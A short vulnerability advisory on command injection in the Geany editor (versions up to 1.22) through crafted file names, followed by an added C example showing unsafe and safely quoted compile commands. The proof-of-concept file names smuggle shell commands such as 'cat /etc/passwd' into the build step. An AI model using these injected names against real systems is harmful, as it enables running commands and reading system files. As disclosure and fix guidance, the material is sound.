Geany <=1.22 Local Code injection Vulnerability



EKU-ID: 2864
Author: D4RKCR1PT3R
Published: 2012-12-10
Verified: Verified

Geany <=1.22 Local Shell Command injection Vulnerability
In what follows, A.B.C.D stands for the command that will be injected.
 
POC:
 
Create a C file (any file will do) and click Save. As the file name, enter: xpl.c";A.B.C.D"
 
Now compile the file in Geany (Build -> Compile, or the shortcut F8); the injected command runs.
 
Examples:
 
xpl.c";ls -la"
xpl.c";cat /etc/passwd"
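
Why these file names break out of the compile command, and how quoting closes the hole, as an added example (not code from this advisory or from Geany). It assumes the compile step is a shell string that wraps the file name in double quotes, which the shape of the PoC file name implies; all function names are hypothetical.

```c
#include <stdio.h>
#include <string.h>

/* Assumed template: file name pasted between double quotes, then run by sh. */
int build_naive(const char *file, char *out, size_t n) {
    int w = snprintf(out, n, "gcc -Wall -c \"%s\"", file);
    return (w >= 0 && (size_t)w < n) ? 0 : -1;
}

/* POSIX sh quoting: wrap in '...' and rewrite every ' as '\'' .
   Unlike "...", single quotes also neutralise $(), backticks and \ . */
int shell_quote(const char *in, char *out, size_t n) {
    size_t o = 0;
    if (n < 3) return -1;
    out[o++] = '\'';
    for (; *in; in++) {
        size_t need = (*in == '\'') ? 4 : 1;
        if (o + need + 2 > n) return -1;   /* keep room for closing ' and NUL */
        if (*in == '\'') { memcpy(out + o, "'\\''", 4); o += 4; }
        else out[o++] = *in;
    }
    out[o++] = '\'';
    out[o] = '\0';
    return 0;
}

int build_quoted(const char *file, char *out, size_t n) {
    char q[512];
    if (shell_quote(file, q, sizeof q) != 0) return -1;
    int w = snprintf(out, n, "gcc -Wall -c %s", q);
    return (w >= 0 && (size_t)w < n) ? 0 : -1;
}

/* Returns 1 if ; & | or newline sits outside quotes (separators only). */
int has_unquoted_separator(const char *cmd) {
    char q = 0;                                   /* active quote char, 0 = none */
    for (; *cmd; cmd++) {
        if (q == '\'') { if (*cmd == '\'') q = 0; }
        else if (*cmd == '\\' && cmd[1]) cmd++;   /* backslash escapes next char */
        else if (q == '"') { if (*cmd == '"') q = 0; }
        else if (*cmd == '\'' || *cmd == '"') q = *cmd;
        else if (strchr(";&|\n", *cmd)) return 1;
    }
    return 0;
}

int main(void) {
    char cmd[600]; const char *f = "xpl.c\";ls -la\"";   /* name from this page */
    build_naive(f, cmd, sizeof cmd);  printf("%s -> %d\n", cmd, has_unquoted_separator(cmd));
    build_quoted(f, cmd, sizeof cmd); printf("%s -> %d\n", cmd, has_unquoted_separator(cmd));
    return 0; }
```

Passing the file name as a separate argv element to the compiler, with no shell involved, removes the need for quoting altogether.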